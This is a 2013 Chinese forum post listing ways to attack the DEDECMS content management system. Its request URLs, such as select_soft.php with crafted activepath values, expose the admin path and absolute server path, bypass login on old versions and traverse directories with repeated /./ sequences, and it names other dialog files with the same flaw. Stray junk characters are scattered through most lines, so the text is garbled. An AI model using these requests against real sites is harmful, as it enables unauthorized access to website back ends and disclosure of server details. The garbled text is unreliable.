1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理' G: h6 W3 C& z* U% j! B
% o. w0 i- H {; B; @6 k( c
员帐号,新版本的就直接转向了后台.; N# \& s0 V1 O: W! ?/ X5 Z3 s
9 A" n ]9 w) T5 y s5 }$ a
2.include/dialog/config.php会爆出后台管理路径
! u( a' R" [. g5 ^" S$ h3 M1 _
2 u2 C; t8 a( v3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录0 I3 F# t: t1 v' D9 [! j$ J
, X) v& L: _/ t8 r, |
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径. `4 u2 k7 d9 d% I3 v2 f: c) E1 s
4 f8 \9 ~/ D" T5 H: w' r" T5 ~
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
+ f# w. j" D0 P0 W6 {
: F: m" C' g, Z2 I; L: l3 g; Y2 z到根目录去.不过这些版本的访问地址有些不同.
6 C" L ?2 [/ C: ^ B地址为require/dialog/select_soft.php?activepath=/././././././././
) f8 B' `- A7 E+ c- U G% P: w7 R9 X( u; k6 p4 k4 w; X
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
' E2 i: o5 y/ Q* {4 t' m6 d存在相同问题的文件还有" j( X+ c+ f8 [6 q
include\dialog\select_images.php* Y ?4 }+ e. r/ w
include\dialog\select_media.php
+ O) O4 d0 }9 u! @8 Dinclude\dialog\select_templets.php
7 l7 |4 ?6 l5 Q: k) \! { |
发表于 2013-4-16 16:50:43
收藏
支持
反对